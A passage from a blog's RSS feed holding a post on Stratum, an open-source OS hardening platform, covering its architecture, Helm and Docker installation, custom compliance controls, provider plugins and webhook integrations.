<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&#038;title=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" data-a2a-url="https://linuxcent.com/broken-access-control-aws-cloud/" data-a2a-title="Broken Access Control in AWS: From Misconfigured S3 to Admin"></a></p><p>The post <a href="https://linuxcent.com/broken-access-control-aws-cloud/">Broken Access Control in AWS: From Misconfigured S3 to Admin</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/broken-access-control-aws-cloud/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1852</post-id>	</item>
		<item>
		<title>Stratum — OS Hardening as a Platform</title>
		<link>https://linuxcent.com/stratum-os-hardening-platform/</link>
					<comments>https://linuxcent.com/stratum-os-hardening-platform/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 31 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Infrastructure as Code]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[OS Hardening]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1834</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>Stratum — open-core (Apache 2.0) OS hardening platform: declare baselines in YAML, build across six clouds, and gate CI/CD deployments on compliance grade.</p>
<p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; the left border colour is overridden per language below. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code inside a pre inherits the panel styling instead. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Accent colours keyed on the data-lang attribute of the pre element. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned to the top-right corner of the pre, hidden until revealed. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Also reveal the button on keyboard focus; otherwise tabbing lands on an invisible control. */
.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative label at the top-left; pointer-events:none keeps it from intercepting clicks. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
/*
 * Code-block enhancer.
 * For every <pre> in the document: reads the language from a "language-xxx"
 * class on the inner <code> (if any), stores it in data-lang, inserts a
 * language badge, and appends a "Copy" button that copies the block's text.
 */
(function(){
  // Guard: run at most once per window, even if this script is included again.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;

  // Returns the text to copy for one <pre>.
  // With a <code> child, only that element's text is used. Without one, the
  // <pre> itself contains the injected button/badge, so they are stripped from
  // a clone first; reading pre.innerText directly would copy the "Copy" label too.
  function copyText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(node){
      node.parentNode.removeChild(node);
    });
    return clone.textContent;
  }

  // Decorates every <pre> currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        // data-lang is what the per-language CSS selectors key on.
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';
        badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=copyText(pre,code);
        // Use the async Clipboard API when present and in a secure context;
        // otherwise (or if it rejects) fall back to the textarea/execCommand path.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }

  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}

  // Fallback copy: select the text in an off-screen textarea and call execCommand('copy').
  function fb(text,btn){
    var ta=null;
    try{
      ta=document.createElement('textarea');
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      // execCommand reports failure by returning false rather than throwing.
      if(!document.execCommand('copy'))throw new Error('copy command was rejected');
      ok(btn);
    }catch(e){
      btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);
    }finally{
      // Always remove the helper textarea, including when the copy failed.
      if(ta&&ta.parentNode)ta.parentNode.removeChild(ta);
    }
  }

  // Run now if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 6</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="https://linuxcent.com/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="https://linuxcent.com/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="https://linuxcent.com/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · <a href="https://linuxcent.com/cicd-compliance-gate-hardened-images/">CI/CD Compliance Gate</a> · <strong>Stratum Platform</strong></em></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub</li>
<li>The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable</li>
<li>Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations</li>
<li>Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API</li>
<li>The series taught the user-facing interface for five episodes; EP06 covers what&#8217;s underneath and how to build on it</li>
<li>Installation is a single <code class="" data-line="">helm install</code> or <code class="" data-line="">docker compose up</code> — the platform runs in your environment</li>
</ul>
<hr />
<h2 id="the-series-arc-inverted">The Series Arc, Inverted</h2>
<p>EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:</p>
<pre><code class="" data-line="">EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)
</code></pre>
<p>For five episodes, you&#8217;ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.</p>
<hr />
<p>I&#8217;ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.</p>
<p>The tools exist. <code class="" data-line="">ansible-lockdown</code> applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn&#8217;t the tooling — it&#8217;s the integration layer that ties them together into a reproducible, auditable pipeline.</p>
<p>Stratum is that integration layer, open-sourced.</p>
<p>The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there&#8217;s no step to skip.</p>
<hr />
<h2 id="the-architecture">The Architecture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌──────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │ POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘
</code></pre>
<p>Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.</p>
<hr />
<h2 id="installation">Installation</h2>
<p>Stratum runs as a set of containers. Kubernetes or Docker Compose both work.</p>
<p><strong>Kubernetes (Helm):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m
</code></pre>
<p><strong>Docker Compose (single-node):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080
</code></pre>
<hr />
<h2 id="the-three-extension-points">The Three Extension Points</h2>
<h3 id="1-custom-compliance-controls">1. Custom Compliance Controls</h3>
<p>Add controls that aren&#8217;t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:</p>
<pre><code class="" data-line=""># controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: &quot;grep -E &#039;^max_log_file_action&#039; /etc/audit/auditd.conf&quot;
  expected: &quot;max_log_file_action = keep_logs&quot;
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: &#039;^max_log_file_action&#039;
        line: &#039;max_log_file_action = keep_logs&#039;
</code></pre>
<p>Deploy the custom control:</p>
<pre><code class="" data-line="">stratum controls deploy --file controls/custom-audit-policy.yaml
</code></pre>
<p>Reference it in any blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001
</code></pre>
<p>Custom controls appear in the grade calculation and SARIF output alongside CIS controls.</p>
<h3 id="2-provider-plugins">2. Provider Plugins</h3>
<p>Add support for a new cloud provider by implementing the provider interface:</p>
<pre><code class="" data-line=""># providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = &quot;my-cloud&quot;

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...
</code></pre>
<p>Register the plugin:</p>
<pre><code class="" data-line="">stratum providers register --file providers/custom_provider.py --name my-cloud
</code></pre>
<p>The provider is now available as <code class="" data-line="">--provider my-cloud</code> in all <code class="" data-line="">stratum build</code> commands.</p>
<h3 id="3-pipeline-integrations">3. Pipeline Integrations</h3>
<p>Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:</p>
<pre><code class="" data-line=""># Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}
</code></pre>
<hr />
<h2 id="the-open-core-model">The Open-Core Model</h2>
<p>Stratum follows the same model as the tools that have become infrastructure standards:</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Open-core model</th>
</tr>
</thead>
<tbody>
<tr>
<td>Terraform / OpenTofu</td>
<td>Core OSS, enterprise features in paid tier</td>
</tr>
<tr>
<td>Cilium / Isovalent</td>
<td>Core OSS, enterprise support/features in paid tier</td>
</tr>
<tr>
<td>Vault / HCP Vault</td>
<td>Core OSS, hosted/enterprise in paid tier</td>
</tr>
<tr>
<td><strong>Stratum</strong></td>
<td>Engine + blueprint + scanner + Pipeline API: Apache 2.0</td>
</tr>
</tbody>
</table>
<p>Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.</p>
<p>The repository is at: <strong>github.com/rrskris/Stratum</strong></p>
<hr />
<h2 id="what-this-series-taught">What This Series Taught</h2>
<p>EP01 — EP06 in one view:</p>
<table>
<thead>
<tr>
<th>Episode</th>
<th>What you learned</th>
<th>What Stratum does</th>
</tr>
</thead>
<tbody>
<tr>
<td>EP01</td>
<td>Default AMIs are insecure by design</td>
<td>Replaces default AMI with a hardened golden image</td>
</tr>
<tr>
<td>EP02</td>
<td>Blueprint as code — the 2am skip disappears</td>
<td>HardeningBlueprint YAML — 5-step wizard or direct YAML</td>
</tr>
<tr>
<td>EP03</td>
<td>One blueprint, six providers, no drift</td>
<td>6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox</td>
</tr>
<tr>
<td>EP04</td>
<td>Automated OpenSCAP — grade at build time</td>
<td>Compliance Scanner: A-F, SARIF, drift detection</td>
</tr>
<tr>
<td>EP05</td>
<td>CI/CD gate — the unhardened image never deploys</td>
<td>Pipeline API: <code class="" data-line="">POST /api/pipeline/scan</code></td>
</tr>
<tr>
<td>EP06</td>
<td>The platform — OSS, self-hostable, extendable</td>
<td>Apache 2.0, Helm install, three extension points</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.</p>
<p>If you&#8217;ve been following the <a href="https://linuxcent.com/ebpf-from-kernel-to-cloud/">eBPF: From Kernel to Cloud series</a>, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.</p>
<p>The next series: <strong>Purple Team Playbook</strong> — real attack paths against cloud and Kubernetes infrastructure, how they&#8217;re detected, and how they&#8217;re closed. Starting May 8.</p>
<p>GitHub: <a href="https://github.com/rrskris/Stratum">github.com/rrskris/Stratum</a></p>
<p>Get the Purple Team series in your inbox → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" 
href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&#038;title=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" data-a2a-url="https://linuxcent.com/stratum-os-hardening-platform/" data-a2a-title="Stratum — OS Hardening as a Platform"></a></p><p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/stratum-os-hardening-platform/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1834</post-id>	</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 

Served from: linuxcent.com @ 2026-06-30 15:03:16 by W3 Total Cache
-->